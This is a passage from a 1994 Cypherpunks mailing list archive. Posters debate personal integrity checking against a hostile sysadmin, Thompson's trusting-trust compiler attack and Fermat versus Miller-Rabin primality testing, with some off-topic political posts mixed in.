simply be replicated. The timestamp algorithm gives you a temporal ordering to distinguish between the two, which signatures don't have. On the other hand, I'll amplify Matt's point by pointing out that any deployed mechanism to increase the difficulty and cost of information subversion is better than what exists now, which is strictly ad hoc. The integration issues of any public authentication system will be difficult, regardless of the underlying mechanism. Eric From eric at remailer.net Tue Dec 27 18:41:01 1994 From: eric at remailer.net (Eric Hughes) Date: Tue, 27 Dec 94 18:41:01 PST Subject: Why I have a 512 bit PGP key In-Reply-To: <9412281256.ZM11042@wiley.sydney.sgi.com> Message-ID: <199412280240.SAA02061@largo.remailer.net> From: "Ian Farquhar" re: personal account tripwire The problem is that although you can protect the data file of hashes (by using a pass phrase to encrypt it), protecting the binary which does the checking is rather more difficult. Why not recompile the binary? All it needs to be is something like md5.c. Eric From adam at bwh.harvard.edu Tue Dec 27 19:06:49 1994 From: adam at bwh.harvard.edu (Adam Shostack) Date: Tue, 27 Dec 94 19:06:49 PST Subject: Why I have a 512 bit PGP key In-Reply-To: <199412280240.SAA02061@largo.remailer.net> Message-ID: <199412280306.WAA25310@bwh.harvard.edu> Eric wrote: | From: "Ian Farquhar" | | re: personal account tripwire | | The problem is that although you can protect the data file of | hashes (by using a pass phrase to encrypt it), protecting the | binary which does the checking is rather more difficult. | | Why not recompile the binary? All it needs to be is something like | md5.c. Or leave the binary on a floppy (assuming you can access floppies, or some other removable media.) The problem reduces pretty quickly to a variant of trusting trust. root can hack the kernel, the math libraries, your shell, or several other points to make life difficult. Can you go through a set of steps so convoluted as to catch this? Probably. But in all likelyhood, its easier to get a personal machine on which to store private files. Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From perry at imsi.com Tue Dec 27 19:07:54 1994 From: perry at imsi.com (Perry E. Metzger) Date: Tue, 27 Dec 94 19:07:54 PST Subject: Why I have a 512 bit PGP key In-Reply-To: <199412280240.SAA02061@largo.remailer.net> Message-ID: <9412280307.AA03703@snark.imsi.com> Eric Hughes says: > From: "Ian Farquhar" > > re: personal account tripwire > > The problem is that although you can protect the data file of > hashes (by using a pass phrase to encrypt it), protecting the > binary which does the checking is rather more difficult. > > Why not recompile the binary? All it needs to be is something like > md5.c. Read Ken Thompson's Turing Award lecture for why that isn't sufficient. Its quite amusing. Lets face it -- if you are truly paranoid, you have to carry your machine around with you at all times and chain it to you. Its all a question of threat model. For national security type attacks nothing less than "chain machine to wrist" will do. For stopping a casual attack, much less is needed. Its all in the threat model... Perry From ianf at sydney.sgi.com Tue Dec 27 19:08:10 1994 From: ianf at sydney.sgi.com (Ian Farquhar) Date: Tue, 27 Dec 94 19:08:10 PST Subject: Why I have a 512 bit PGP key In-Reply-To: <199412280240.SAA02061@largo.remailer.net> Message-ID: <9412281357.ZM11227@wiley.sydney.sgi.com> On Dec 27, 6:40pm, Eric Hughes wrote: > The problem is that although you can protect the data file of > hashes (by using a pass phrase to encrypt it), protecting the > binary which does the checking is rather more difficult. > > Why not recompile the binary? All it needs to be is something like > md5.c. I take it you mean recompile the binary every time? Because you'd need to have source around to recompile it from, and the attacker could modify that source even more easily than he or she could hack the binary. The idea is to make tampering with the binary detectable. Ultimately, the aim is to make it too difficult to break and thus cause most people to give up. I am pretty much certain that to make such a system perfectly secure under these conditions is impossible. What I am aiming for, I suppose, is to make sure that there are no trivial attacks which could compromise security. If you've got a system admin who is willing and capable of hacking exec in the kernel, then it's time to move systems. :) Ian. From snyderra at dunx1.ocs.drexel.edu Tue Dec 27 19:31:48 1994 From: snyderra at dunx1.ocs.drexel.edu (Bob Snyder) Date: Tue, 27 Dec 94 19:31:48 PST Subject: Making sure a program gets to the receiver intact Message-ID: -----BEGIN PGP SIGNED MESSAGE----- At 12:30 PM 12/28/94, Ian Farquhar wrote: >The ftpd's that implement the directory-change messages is not a standard >one, and that functionality has been added to the servers which support it >(possibly Linux ships with wuftpd, but no commercial version of Unix I know >does.) The extended servers are very widely available, and although they >do make ftp so much nicer to administer, they are not as widely deployed as I >would have expected by now. BSD/OS, from BSDI, ships with wuarchive's ftpd. Most sites offering any serious quantity of files have a new ftpd, like wuarchive's. Bob -----BEGIN PGP SIGNATURE----- Version: 2.6 iQCVAwUBLwDYL+S0CjsjWS0VAQEOKAP9FXIfEaM2/cF5VPPXIA+Nko/3zdCbWot8 Nl9WjSjnpV2vaKnUYkhVUF7fslMaDBAjk24fvSj7eSjjY4YOxHmWRaJ1X189iZpz pCA4aXh/KXZDQhRQnfe/MojmqBLhAaFwYrC17Pq90Ab/WSNPLZ6ahTpKKEwf/fEA iK4ronPRz14= =rRwk -----END PGP SIGNATURE----- -- Bob Snyder N2KGO MIME, PGP, RIPEM mail accepted snyderra at post.drexel.edu PGP & RIPEM keys on key servers When cryptography is outlawed, bayl bhgynjf jvyy unir cevinpl. From prince at alpha.c2.org Tue Dec 27 20:05:42 1994 From: prince at alpha.c2.org (Niccolo di Bernardo Machiavelli) Date: Tue, 27 Dec 94 20:05:42 PST Subject: Phil's Plight Message-ID: <199412280403.UAA22893@infinity.c2.org> -----BEGIN PGP SIGNED MESSAGE----- Well fellow Cypherpunks, I am amazed and shocked. One of our own, Phil Zimmermann is in deep shit and it's about to get deeper. As of this date I have seen very little discussion on how we can help him out. The thing that shocks me the most, is that Phil and the PGP development team have laid the basis for a lot of the Cypherpunk tools we take for granted. And still with all of the distractions and worries that he currently has, he's working on new tools, that I'm sure we will use and implement in various projects. I think Phil deserves better than the silence his plight has received as of late. I know if we put our collective heads together, we can come up with many ways to help him out. Organized fund raisers might be a good way to start, or perhaps a fax campaign to make the media and legislators aware of his situation. The possibilities abound. If we don't take care of our own, who will? This post might start a flame war. If it does, I do not apologize. At least the topic is being discussed. Nick -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQEVAwUBLwDgklr3MzuHJu11AQHSdQf/ZgiuWOonZC/VI7BqmVV5iKMTbqe3FzP0 6TUa7GzEU+rnBSBUQCGBZjKFtuBeW3WlRp1va+TEdhJY4RlhJf919cKHJN0F4h8f HgvlAl227OuOfZ6nhneM23hrKbbas7YnuSbcxNmGsTXK/s7Fk19nrsvvEpM/eFmZ ocNL2J57MGJpRuos0+anZavqwEFB01qt5eakDEKnx9BFStsgOAjB/U5lnDOAjHZM /w7hTgZ/A6xCCnOaBICqWmmZfdaNQlcTqYLriPryFPG9C34MQ5MDr3mJMTSmPIgR NcDESOs4ncaMszEB5C5TnufJFH5aM1SQjXOQH/BzrH87/eKsyElOQA== =AX7D -----END PGP SIGNATURE----- From eric at remailer.net Tue Dec 27 20:52:26 1994 From: eric at remailer.net (Eric Hughes) Date: Tue, 27 Dec 94 20:52:26 PST Subject: Why I have a 512 bit PGP key In-Reply-To: <9412280307.AA03703@snark.imsi.com> Message-ID: <199412280452.UAA02244@largo.remailer.net> Read Ken Thompson's Turing Award lecture for why that isn't sufficient. Its quite amusing. I'm quite familiar with the work. [For those who aren't, it's about compilers that compile in self-perpetuating bugs from their own source code.] The question, however, is not one of possibility but timeliness. Attacks against persistent information are easier than attacks against transient information. If the sysadmin is going to go modifying compilers, it's no longer annoyance. Eric From eric at remailer.net Tue Dec 27 20:55:04 1994 From: eric at remailer.net (Eric Hughes) Date: Tue, 27 Dec 94 20:55:04 PST Subject: Why I have a 512 bit PGP key In-Reply-To: <9412281357.ZM11227@wiley.sydney.sgi.com> Message-ID: <199412280454.UAA02250@largo.remailer.net> From: "Ian Farquhar" I take it you mean recompile the binary every time? Because you'd need to have source around to recompile it from, and the attacker could modify that source even more easily than he or she could hack the binary. The idea is to make tampering with the binary detectable. Recompile the binary from newly uploaded source each time. MD5 source isn't more than about 10K long. That's all of a few seconds of upload time. I am pretty much certain that to make such a system perfectly secure under these conditions is impossible. That's right. Eric From ianf at sydney.sgi.com Tue Dec 27 21:39:09 1994 From: ianf at sydney.sgi.com (Ian Farquhar) Date: Tue, 27 Dec 94 21:39:09 PST Subject: Why I have a 512 bit PGP key In-Reply-To: <199412280454.UAA02250@largo.remailer.net> Message-ID: <9412281627.ZM11604@wiley.sydney.sgi.com> On Dec 27, 8:54pm, Eric Hughes wrote: > I take it you mean recompile the binary every time? Because you'd > need to have source around to recompile it from, and the attacker > could modify that source even more easily than he or she could hack > the binary. The idea is to make tampering with the binary detectable. > Recompile the binary from newly uploaded source each time. MD5 source > isn't more than about 10K long. That's all of a few seconds of upload > time. Irritating, and also insecure (system admin intercepts the upload and replaces it with source of his or her own). As has been stated, it's a matter of defining a threat model. IMO, the most likely threat is from pass phrase grabbing (from a sniffer, annex box or whatever), which destroys the security of almost all of these schemes. Modification attacks are possible, although I doubt that the lengths I have described would be useful. As a serious project, though, a personal version of tripwire would not be a bad cypherpunk project, and possibly a nice testbed for working out some anti-tampering techniques. > I am pretty much certain that to make such > a system perfectly secure under these conditions is impossible. > That's right. Is there a standard proof for this, though? I suspect that there is, but have not discovered it. Ian. From eric at remailer.net Tue Dec 27 23:13:16 1994 From: eric at remailer.net (Eric Hughes) Date: Tue, 27 Dec 94 23:13:16 PST Subject: Why I have a 512 bit PGP key In-Reply-To: <9412281627.ZM11604@wiley.sydney.sgi.com> Message-ID: <199412280713.XAA02404@largo.remailer.net> From: "Ian Farquhar" > Recompile the binary from newly uploaded source each time. MD5 source > isn't more than about 10K long. That's all of a few seconds of upload > time. Irritating [...] ??? An upload can be automated, just like anything other solution. [...] and also insecure (system admin intercepts the upload and replaces it with source of his or her own). _Every_ solution to this problem is insecure, when it comes down to it. What you asked for is something that makes things more difficult. Interception can be made quite difficult. Make the "upload" consist of simulating a keyboard typing the source code into emacs. Change the file name each time. Obfuscate the source by redefining variables each time. Pipe the output directly into the compiler; hell, compile straight from stdin! You can't go about protecting against the modification of binaries by relying upon one of your binaries being better protected than the rest. There's an infinite regress involved here. The solution is to go outside the regress. Recreating the binary from scratch is one way. I'm sure there are others. > I am pretty much certain that to make such > a system perfectly secure under these conditions is impossible. Is there a standard proof for this, though? I suspect that there is, but have not discovered it. Get the essay that Perry mentioned and start there. Keep in mind that object code can be interpreted in many different ways, only one of them typically expected. Eric From jeffb at sware.com Wed Dec 28 06:03:12 1994 From: jeffb at sware.com (Jeff Barber) Date: Wed, 28 Dec 94 06:03:12 PST Subject: Why I have a 512 bit PGP key In-Reply-To: <199412280713.XAA02404@largo.remailer.net> Message-ID: <9412281344.AA09514@wombat.sware.com> Eric Hughes writes: > > From: "Ian Farquhar" > > > Recompile the binary from newly uploaded source each time. MD5 source > > isn't more than about 10K long. That's all of a few seconds of upload > > time. > > Irritating [...] > > ??? An upload can be automated, just like anything other solution. Then the automated part (script or whatever) simply becomes another piece that needs to be protected. > You can't go about protecting against the modification of binaries by > relying upon one of your binaries being better protected than the > rest. There's an infinite regress involved here. The solution is to > go outside the regress. Recreating the binary from scratch is one > way. I'm sure there are others. No -- in the absence of other measures, recreating the binary from scratch is not such a way. You've merely added the compiler and its associated utilities to your regression list. Nothing is gained -- other than additional irritation and delay. -- Jeff From pfarrell at netcom.com Wed Dec 28 06:53:38 1994 From: pfarrell at netcom.com (Pat Farrell) Date: Wed, 28 Dec 94 06:53:38 PST Subject: Why I have a 512 bit PGP key Message-ID: <35603.pfarrell@netcom.com> eric at remailer.net (Eric Hughes) writes: >> Read Ken Thompson's Turing Award lecture for why that isn't >> sufficient. Its quite amusing. > > I'm quite familiar with the work. [For those who aren't, it's about > compilers that compile in self-perpetuating bugs from their own source > code.] > > Get the essay that Perry mentioned and start there. Keep in mind that > object code can be interpreted in many different ways, only one of > them typically expected. I strongly agree with both Perry that it is amusing and with Eric that everyone should read it. But I see it as more germane than Eric. It is not about arbitrary self perpetuating bugs from source. It is about serious security holes that are self perpetuatated by the binaries of the complier. The compiler ignores its own source and generates security hacked binaries, even when the source looks like it is corrected. One strongly held belief among lots on this list and in the PGP advocacy world is that the availability of source guarentees security. Thompson's lecture throroughly dispells that hope, crushing the "guarentee" completely. Drawing from Thompson, a simple MD5 is not sufficient. Youd have to have multiple compilers, perferably on different cpu architectures, build the tool from source, and compare the results. Then, and only then, could you claim that you were secure. Of course, this is far too much work to be practical. And this approach is impracticale without need to invent a conspiracy between the compiler developers. Pat p.s. HappyNewYear! Pat Farrell Grad Student pfarrell at cs.gmu.edu Department of Computer Science George Mason University, Fairfax, VA Public key availble via finger #include From danisch at ira.uka.de Wed Dec 28 07:39:14 1994 From: danisch at ira.uka.de (Hadmut Danisch) Date: Wed, 28 Dec 94 07:39:14 PST Subject: Are 2048-bit pgp keys really secure ? Message-ID: <9412281539.AA20170@elysion.iaks.ira.uka.de> > There was a paper in the last seven or eight years on this. I believe > Pomerance was one of the authors. Ask on sci.crypt for details. Meanwhile I found the Rivest-Article "Finding Four Million Large Random Primes". It is in Proceedings of Crypto 90, not 91. It references some papers of Pomerance. > Rabin-Miller would be better. It would be instructive to examine the > conditional probability that a composite number which fails > Rabin-Miller passes Fermat. I understand it's vanishingly small. What is "vanishingly small" ? The chance to break a 1024-bit-key is also vanishingly small. And the keylength is increased to 2048 bit. Does anyone know how many Carmichael-Numbers exist? A Carmichael-Number m is a number where foreach a : gcd(a,m)=1 => a^(m-1) = 1 mod m e.g. 561 = 3*11*17 If you found a Carmichael-Number consisting of primes bigger than the primes in your small-numbers-sieve, the Fermat-test won't detect it as a non-prime. Since Carmichael-Numbers have at least three prime factors, a 2048-bit n would consist of one ~1024-prime and at least three other primes. At least one of them would be smaller than ~340 bit, probably significant smaller. Hadmut From eric at remailer.net Wed Dec 28 07:51:50 1994 From: eric at remailer.net (Eric Hughes) Date: Wed, 28 Dec 94 07:51:50 PST Subject: Why I have a 512 bit PGP key In-Reply-To: <9412281344.AA09514@wombat.sware.com> Message-ID: <199412281551.HAA02892@largo.remailer.net> From: Jeff Barber > ??? An upload can be automated, just like anything other solution. Then the automated part (script or whatever) simply becomes another piece that needs to be protected. There need be no part of the script/etc. that relies upon persistent information on the target machine. You can simulate the whole thing as typing, if need be. You've merely added the compiler and its associated utilities to your regression list. It occurs to me that there's no need even to use the compiler, if you're willing to upload binary images directly. And if you want to use the compiler, the effort involved in making a recognizer for an ever mutating source is not trivial. Variable names can change, parse trees can change, control structures can change. Nothing is gained -- other than additional irritation and delay. Additional cost of subversion is _exactly_ the issue here. We're not talking about perfect security; that's impossible in this case, and has been acknowledged as impossible. What is at issue is making it difficult for a not-completely-dedicated-to-your-destruction sysadmin to subvert personal files. Furthermore, the pragmatics of a personal tripwire are that it only needs to indicate failure once. As soon as I found out that my files weren't safe in their place of residence, I'd leave. The practical question should not be one of fighting a running battle with a hostile root; root always wins, period. A useful outcome of this discussion would be a feasible way of detecting the first modification. Almost always this will not be a full-scale effort. Eric From eric at remailer.net Wed Dec 28 08:20:02 1994 From: eric at remailer.net (Eric Hughes) Date: Wed, 28 Dec 94 08:20:02 PST Subject: Why I have a 512 bit PGP key In-Reply-To: <35603.pfarrell@netcom.com> Message-ID: <199412281619.IAA02917@largo.remailer.net> From: "Pat Farrell" >> Read Ken Thompson's Turing Award lecture for why that isn't >> sufficient. Its quite amusing. But I see it as more germane than Eric. It is not about arbitrary self perpetuating bugs from source. It is about serious security holes that are self perpetuatated by the binaries of the complier. "Bugs" is shorthand for any arbitrary deviation from nominal source code function. Come on, do you expect a one sentence summary to be accurate in all detail? Drawing from Thompson, a simple MD5 is not sufficient. A single, unchanging, global MD5 source would be insufficient. That's not what I mentioned, but rather a constantly changing MD5 source. One could also change the arbitrary constants in the MD5 source for a "personal MD5". Here's a summary of these self-perpetuating false compilers. There is an intermediate source code with the arbitrary deviant function expressed. A true compiler compiles this into the false compiler. The arbitrary function includes a recognizer and a payload. The false compiler recognizes the source code of the true compiler. At this recognition, the corresponding payload is compiled in. The payload includes all the arbitrary deviant function of the intermediate source, including the recognizer. Thus the false compiler will compile itself from the true source. [This is a summary. I believe Thompson's original work has a full intermediate compiler; this makes the attack easier to perform, but is not essential.] Any such attack on the compiler requires a recognizer. This is the point of weakness, since recognizing arbitrary function is mighty difficult. The strongest form of the problem is unsolvable; it's a quick corollary from the solution to the halting problem. Practically speaking, however, the problem is more tractable, because the ability to change the source to some arbitrary form is not unconstrained. You can, however, make recognizing a source _extremely_ difficult. Plus, if you're only interested in finding the first integrity failure, the recognizer has to work on a source which the author of the recognizer hasn't even seen yet! Even with public source code of a source scrambler available to the recognizer author, the scrambler can use combinatorial explosions to eliminate hooks for recognition. Reordering of parallelism, for example, or creative use of aliasing -- the number of techniques available is huge. And that's only for a single algorithm. Lots of functions exist that will detect modification. CRC's are a good example; there are _lots_ of primitive polynomials available for making your very own personal CRC checker. Remember, you only really need to detect the first modification. Eric From eric at remailer.net Wed Dec 28 08:26:08 1994 From: eric at remailer.net (Eric Hughes) Date: Wed, 28 Dec 94 08:26:08 PST Subject: Are 2048-bit pgp keys really secure ? In-Reply-To: <9412281539.AA20170@elysion.iaks.ira.uka.de> Message-ID: <199412281625.IAA02926@largo.remailer.net> From: danisch at ira.uka.de (Hadmut Danisch) > Rabin-Miller would be better. It would be instructive to examine the > conditional probability that a composite number which fails > Rabin-Miller passes Fermat. I understand it's vanishingly small. What is "vanishingly small" ? Small enough to ignore for the practice of "pretty good" security. There are algorithms to prove primality. See Cohen's excellent _A Course in Computational Algebraic Number Theory_, from Springer. Does anyone know how many Carmichael-Numbers exist? An infinite number. This was just proven in the last two years. The density of Carmichael numbers is very small. As I recall, this paper also included Pomerance, but I don't remember if he did the bulk of the work or not. If you found a Carmichael-Number consisting of primes bigger than the primes in your small-numbers-sieve, the Fermat-test won't detect it as a non-prime. Miller-Rabin will, however. Since most of the time generating a modulus has to do with testing composites, the added time for a few more modexp's to do M-R is small. The large effort is that of the authors of the crypto package to implement and debug it. Eric From jeffb at sware.com Wed Dec 28 08:40:21 1994 From: jeffb at sware.com (Jeff Barber) Date: Wed, 28 Dec 94 08:40:21 PST Subject: Why I have a 512 bit PGP key In-Reply-To: <199412281551.HAA02892@largo.remailer.net> Message-ID: <9412281640.AA09644@wombat.sware.com> Eric Hughes writes: > From: Jeff Barber > Nothing is gained -- > other than additional irritation and delay. > What is at issue is making it > difficult for a not-completely-dedicated-to-your-destruction sysadmin > to subvert personal files. But you're advocating what are non-trivial measures in an attempt to solve a problem which is not the easiest attack anyway. You have been arguing that it might be possible to download a new MD5, then modify it in unusual ways to prevent hacking of the local compiler to recognize it. Then, when folks point out other ways to subvert your integrity check, you complain that you're not trying to solve ALL the problems, only a certain subset. I think the subset you've selected is arbitrary and not particularly realistic. Let's face it, creating the compiler-to-recognize-MD5 is quite a difficult problem, and if I were your system administrator and wanted to obtain access to your files, creating a special compiler version or otherwise attempting to cause your integrity check to fail would be one of the last forms of attack I'd try. > Furthermore, the pragmatics of a personal tripwire are that it only > needs to indicate failure once. As soon as I found out that my files > weren't safe in their place of residence, I'd leave. The practical > question should not be one of fighting a running battle with a hostile > root; root always wins, period. A useful outcome of this discussion > would be a feasible way of detecting the first modification. Almost > always this will not be a full-scale effort. I agree that would be useful. But the problem with this whole argument is that the number of things whose modification you need to detect is large and their detection is non-trivial. One of the easiest ways to subvert your security is simply to record your keystrokes. It doesn't take a rocket scientist to hack your kernel (or whatever it's called on your OS) to do this. And how do you detect it? The original kernel can be restored after booting with a hacked kernel so you can't use modification times. Perhaps you can then detect that the system was rebooted? Well, maybe, but hiding that is not so difficult either, and a reboot may not necessarily seem suspicious in any case. The bottom line is that, as an ordinary user, you are relying completely on your trust in the system administrator. -- Jeff From danisch at ira.uka.de Wed Dec 28 09:08:00 1994 From: danisch at ira.uka.de (Hadmut Danisch) Date: Wed, 28 Dec 94 09:08:00 PST Subject: Why I have a 512 bit PGP key Message-ID: <9412281707.AA20289@elysion.iaks.ira.uka.de> > Let's face it, creating the compiler-to-recognize-MD5 is quite a difficult > problem, and if I were your system administrator and wanted to obtain > access to your files, creating a special compiler version or otherwise > attempting to cause your integrity check to fail would be one of the last > forms of attack I'd try. Who says that your attacker is your admin? Is anybody here who ever checked the source of the gcc compiler? Why not modify the gcc to make it compile specific crypto software (e.g. pgp) wrong, smuggling in any weakness? Everyone checks the pgp signatures after receiving a new version (do you?). Who checks the gcc ? Who checks the SunOS-cc ? If the government wants to attack software like pgp it would be easier to modify compilers than modifying the crypto sources. > One of the easiest ways to > subvert your security is simply to record your keystrokes. It doesn't > take a rocket scientist to hack your kernel (or whatever it's called on > your OS) to do this. And how do you detect it? Why not building keyboards with 4MByte RAM ? Let him use any OS he wants to use. Read out the keyboard at night by room-cleaning staff or by any program able to communicate in a network. Hadmut From david.lloyd-jones at canrem.com Wed Dec 28 10:18:34 1994 From: david.lloyd-jones at canrem.com (David Lloyd-Jones) Date: Wed, 28 Dec 94 10:18:34 PST Subject: MILTON ON CSPAN In-Reply-To: <199412261450.GAA25182@kiwi.CS.Berkeley.EDU> Message-ID: <60.18079.6525.0C1C5F30@canrem.com> Adam Shostack sez: AM+| if you have cable, Milton Friedman will be discussing Hayek on CSPAN +| (I'm not sure whether I or II, I think I) this Wednesday at 8. On behalf of the Second International may I comment, without seeing the show, but having read most of their books? As far as Friedman and Schwartz are concerned they have made a good career out of a simple insight, "inflation is always and everywhere a monetary phenomenon". When I was two and three years old being pulled around in a sled as my parents organised the socialist revolution (during the war this consisted of voting for the Commonwealth Party and opposing the Communists; Conservative and Labour, the government, were both so hated they were not in the game...) I was always told that inflation was too much money chasing too few goods. Hmmm.... When I grew up I met people who had been two cells over from Hayek in their filthy Austrian jail. Hayek kept on muttering: socialism leads to fascism, socialism leads to fascism, return to previous two clauses and repeat... Social democrats, including my friend just down the corridor from Hayek, thought that fascism resulted from chaos, stupidity, and lack of social organisation. I support the Lions Club to this day, sing Bingo for the Catholics; I support every farm co-op, not because I think their economics is sound but because I think that neighbours working together is something to be supported every time you see it. * * * What Milton says about Hayek on television will probably be clean, appealing, rational, and clear to the minds of the very young. Limited, however, in its use. -dlj. david.lloyd-jones at canrem.com * 1st 1.11 #3818 * A piano is a piano is a piano. -- Gertrude Steinway From david.lloyd-jones at canrem.com Wed Dec 28 10:18:50 1994 From: david.lloyd-jones at canrem.com (David Lloyd-Jones) Date: Wed, 28 Dec 94 10:18:50 PST Subject: good blaze quote In-Reply-To: Message-ID: <60.18078.6525.0C1C5F2F@canrem.com> DD+I have a flawless philosophic/scientific model of reality. +Unfortunately, it's actual size. So far you're doin' fine. DD+>Cypherpunks write code, and design protocols, and analyze ciphers, and +>assess risks, and write articles, and attend conferences, and lobby +>Congress, and in general look at the world with a critical eye. Actually real punks hack whole systems, so we go out and run Congress, (me) or Japanese science (my ex-wife) or the CIA and State Department in Africa (the woman I am about to marry). Everything you say about writing code, designing protocols, analysing ciphers and assessing risks (also writing articles and attending conferences) is pretty much correct. It also helps to sleep with the right women at times, a point which seems to escape the essentially male computer-freek culture. Good table manners and a certain amount of familiarity with other languages help; my next wife, for instance, is only mine because I can say "ayin l'gazal", eyes like a gazelle's, something I must have picked up while sussing out your local bunch of AK-47 carrying terorists -- or half-starved recent Canadian immigrants, whichever story you care to believe. I have to leave now: I am about to be visited by my neighborhood sociopath, a guy who works for Steve Wynn and all those folksin Las Vegas. He has a new and interesting story to tell me. I've heard it all before. But it's going to be interesting to hear the latest version. -dlj. david.lloyd-jones at canrem.com * 1st 1.11 #3818 * Who won't do the arithmetic will live by stupid policies. From cort at ecn.purdue.edu Wed Dec 28 10:20:39 1994 From: cort at ecn.purdue.edu (cort) Date: Wed, 28 Dec 94 10:20:39 PST Subject: recognizing the essence Message-ID: <199412281820.NAA15426@en.ecn.purdue.edu> Eric and Co. were discussing the "hiding" (obfuscating?) of source code. I am interested in identifying source code (similarities). I would like to review literature and available programs for recognizing plagiarism (of computer source code). (There is potential for a law suit in this case.) I have heard of computer science professors using such programs to thwart would-be cheaters on class programming assignments. From what I remember these were probabilistic. n% likeness give m% probability of cheating, etc. Does anyone have pointers for me? Cort. From jamesd at netcom.com Wed Dec 28 11:48:59 1994 From: jamesd at netcom.com (James A. Donald) Date: Wed, 28 Dec 94 11:48:59 PST Subject: Why I have a 512 bit PGP key In-Reply-To: <9412281707.AA20289@elysion.iaks.ira.uka.de> Message-ID: On Wed, 28 Dec 1994, Hadmut Danisch wrote: > > If the government wants to attack software like pgp it would be > easier to modify compilers than modifying the crypto sources. > A compiler can recognize one specific piece of code or a few specific peices of code and do something perverse. It cannot recognize functionally equivalent code, this being a high order artificial intelligence problem. Thus if someone used a perverted compiler to develop, debug, and enhance the targe code, he would immediately discover the compiler was perverted. --------------------------------------------------------------------- We have the right to defend ourselves and our property, because of the kind of animals that we James A. Donald are. True law derives from this right, not from the arbitrary power of the omnipotent state. jamesd at netcom.com From raph at CS.Berkeley.EDU Wed Dec 28 12:04:24 1994 From: raph at CS.Berkeley.EDU (Raph Levien) Date: Wed, 28 Dec 94 12:04:24 PST Subject: recognizing the essence In-Reply-To: <199412281820.NAA15426@en.ecn.purdue.edu> Message-ID: <199412282004.MAA07069@kiwi.CS.Berkeley.EDU> The most famous and widely used plagiarism detector here at Berkeley must be the one John Osterhout wrote. It basically detects similarities in program structure (call graph, loops, conditionals, etc.) It was used in the undergraduate compilers class. I believe the output of the program is a list of pairs, ordered by decreasing similarity. The professor spoke to the top two matches, they both ended up confessing. He didn't check more for lack of time. I believe the source code _isn't_ publicly available. Good luck. Raph From hfinney at shell.portal.com Wed Dec 28 12:04:44 1994 From: hfinney at shell.portal.com (Hal) Date: Wed, 28 Dec 94 12:04:44 PST Subject: Are 2048-bit pgp keys really secure ? Message-ID: <199412282004.MAA04125@jobe.shell.portal.com> -----BEGIN PGP SIGNED MESSAGE----- One thing to keep in mind is that other things can go wrong than Carmichael-like numbers in finding false primes. You can get hardware errors. Here is my estimate of the chance of an undetected memory parity error. Let us suppose that a 8 MB PC uses parity protection per byte and gets one parity error per year of operation. This is just a guess but I have occasionally seen parity errors on PC's and I certainly don't use them full time 24 hours a day for a year! So the chance of a particular byte getting a parity error in a particular one-minute period (approximately the time for a key generation) is 1/(8M * 365 * 24 * 60) or about 2E-13 (2 times 10 to the minus 13). The chances of 2 parity errors, which would then be undetected, would be the square of this, or about 6E-26. During key generation let us just look at the data and say that there are about 256 bytes in the active working set at any time, so the chance of an error in an important byte is about 1.4E-23. So if your chance of the Fermat test failing is much less than about 10^-23 then you would do better to invest in a more expensive PC than in improving the test. And of course there are other hardware failure modes as well, which should increase this threshold. Hal -----BEGIN PGP SIGNATURE----- Version: 2.6 iQBVAwUBLwGdahnMLJtOy9MBAQGolwIAzZFbwVx0pqLV3MgQrBYOWELISIsVgj5g BywmOcdqDZiqPAi+gTqR4C/zZQnHgLnnsxDH45OBcaVDHv8D4uSvjQ== =6YIb -----END PGP SIGNATURE----- From mab at crypto.com Wed Dec 28 12:20:29 1994 From: mab at crypto.com (Matt Blaze) Date: Wed, 28 Dec 94 12:20:29 PST Subject: Why I have a 512 bit PGP key Message-ID: <199412282021.PAA12355@crypto.com> >A compiler can recognize one specific piece of code or a few >specific peices of code and do something perverse. It cannot >recognize functionally equivalent code, this >being a high order artificial intelligence problem. > >Thus if someone used a perverted compiler to develop, debug, and >enhance the targe code, he would immediately discover the compiler >was perverted. > If I were going to implement a compiler-based attack against a piece of security software, I'd probably do it entirely by altering the linker. That is, I'd have the linker recognize that it was emiting a program called "pgp" or "pem" or "cfs" or whatever and have it put a wrapper around the final executable module that simply records any I/O and sends it to me. With shared libraries, building such a wrapper would be especially easy; just have all I/O go to your library instead of the standard one. It's also not hard to imagine ways in which such an attack could be extended to fool even customized versions of systems like tripwire into always reporting fixed results when run on particular files. -matt From jalicqui at prairienet.org Wed Dec 28 12:20:56 1994 From: jalicqui at prairienet.org (Jeff Licquia) Date: Wed, 28 Dec 94 12:20:56 PST Subject: Why I have a 512 bit PGP key Message-ID: <9412282021.AA01830@firefly.prairienet.org> From: Jeff Barber >Let's face it, creating the compiler-to-recognize-MD5 is quite a difficult >problem, and if I were your system administrator and wanted to obtain >access to your files, creating a special compiler version or otherwise >attempting to cause your integrity check to fail would be one of the last >forms of attack I'd try. Perhaps, then, we need to discuss exactly what attacks your average sysadmin would be expected to make. I would think that you'd need to guard against two kinds of sysadmins: 1. The "gentleperson" sysadmin. Though this person might have reason to want to do nasty things to you, (s)he is restricted, either by personal morals or company policy, to doing things that are "proper". Hacking the kernel or the compiler would be out; rather, this person would be more apt to be liberal in his/her use of root privileges, possibly installing user-space keypress monitors (like ttysnoop or some X keygrabber). Schemes like a "personal tripwire", MD5 hashes of various important programs, and so on would be effective against this kind of attacker. 2. "Sysadmin Hatfield." You're McCoy; you get the picture. Nothing is below him/her. Your best protection: never log in. The problem lies in distinguishing the two, and specifically detecting the latter at any point (in case the former becomes the latter by, say, a policy change), as Eric pointed out. >The bottom line is that, as an ordinary user, you are relying completely >on your trust in the system administrator. ...or your computer policy department. Remember, not even sysadmins are God. While it's likely that a sysadmin could hack the kernel to substitute bogus MD5 hashes, doing so in certain environments could earn the sysadmin a quick exit from employment. If your sysadmin just didn't like you, it's possible to get the upper hand; if the sysadmin has the added advantage of little to no oversight, you're screwed. From entropy at IntNet.net Wed Dec 28 14:04:39 1994 From: entropy at IntNet.net (Jonathan Cooper) Date: Wed, 28 Dec 94 14:04:39 PST Subject: recognizing the essence In-Reply-To: <199412282004.MAA07069@kiwi.CS.Berkeley.EDU> Message-ID: > I believe the source code _isn't_ publicly available. Perhaps the professor would be willing to run the gentleman who inquired's code samples through it and mail him the output? I can certainly understand why it's not available. . . -jon ( --------[ Jonathan D. Cooper ]--------[ entropy at intnet.net ]-------- ) ( PGP 2.6.2 keyprint: 31 50 8F 82 B9 79 ED C4 5B 12 A0 35 E0 9B C0 01 ) ( home page: http://hyperreal.com/~entropy/ ]-------[ Key-ID: 4082CCB5 ) From ianf at sydney.sgi.com Wed Dec 28 14:10:49 1994 From: ianf at sydney.sgi.com (Ian Farquhar) Date: Wed, 28 